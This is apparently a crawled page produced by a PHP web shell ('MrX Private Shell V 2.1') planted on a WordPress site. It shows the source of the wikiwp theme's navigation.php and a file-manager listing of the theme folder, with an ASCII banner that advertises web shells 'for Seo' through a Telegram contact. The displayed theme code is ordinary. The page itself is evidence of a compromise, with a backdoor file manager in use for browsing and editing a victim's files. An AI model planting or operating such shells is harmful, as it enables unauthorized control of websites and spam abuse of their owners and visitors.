__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="navMenuButton">
<header class="navMenuButtonTitle"><?php echo __('Menu', 'wikiwp'); ?></header>
<div class="navMenuButtonContent">
<hr>
<hr>
<hr>
</div>
</div>
<div class="primary-menu primary-menu-side">
<div class="primary-menu-container">
<nav class="nav-container">
<?php
// Main menu with fallback
wp_nav_menu(array(
'theme_location' => 'main-menu',
'items_wrap' => '<ul class="main-menu">%3$s</ul>',
'fallback_cb' => 'main_menu_fallback',
));
// Main menu fallback
function main_menu_fallback() {
echo '<ul class="default-nav">';
// show pages
wp_list_pages( $args = array(
'title_li' => '<span class="menu-title">'. __('Pages', 'wikiwp') .'</span>'
));
// show categories
wp_list_categories( $args = array(
'title_li' => '<hr><span class="menu-title">'. __('Categories', 'wikiwp') .'</span>'
));
echo '</ul>';
}
// Meta menu
wp_nav_menu(array(
'theme_location' => 'meta-menu',
'items_wrap' => '<ul class="meta-menu">%3$s</ul>',
'fallback_cb' => '',
));
?>
</nav>
<div class="dynamic-sidebar dynamic-sidebar-navigation">
<div class="row sidebarContent">
<div class="col-md-12">
<?php if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar('navigation') ) : endif; ?>
</div>
</div>
</div>
</div>
</div>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| en | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| 404.php | File | 565 B | 0644 |
|
| author.php | File | 1.86 KB | 0644 |
|
| category.php | File | 1.44 KB | 0644 |
|
| changelog.md | File | 13.25 KB | 0644 |
|
| comments.php | File | 927 B | 0644 |
|
| content.php | File | 524 B | 0644 |
|
| footer.php | File | 1.38 KB | 0644 |
|
| functions.php | File | 27.15 KB | 0644 |
|
| header.php | File | 2.72 KB | 0644 |
|
| index.php | File | 1.93 KB | 0644 |
|
| license.md | File | 1.72 KB | 0644 |
|
| navigation.php | File | 1.74 KB | 0644 |
|
| page.php | File | 280 B | 0644 |
|
| postinfo.php | File | 2.82 KB | 0644 |
|
| readme.md | File | 816 B | 0644 |
|
| screenshot.png | File | 146 KB | 0644 |
|
| search.php | File | 1.48 KB | 0644 |
|
| searchform.php | File | 401 B | 0644 |
|
| sidebar.php | File | 3.17 KB | 0644 |
|
| single.php | File | 506 B | 0644 |
|
| style.css | File | 24.24 KB | 0644 |
|
| wiki-page.php | File | 389 B | 0644 |
|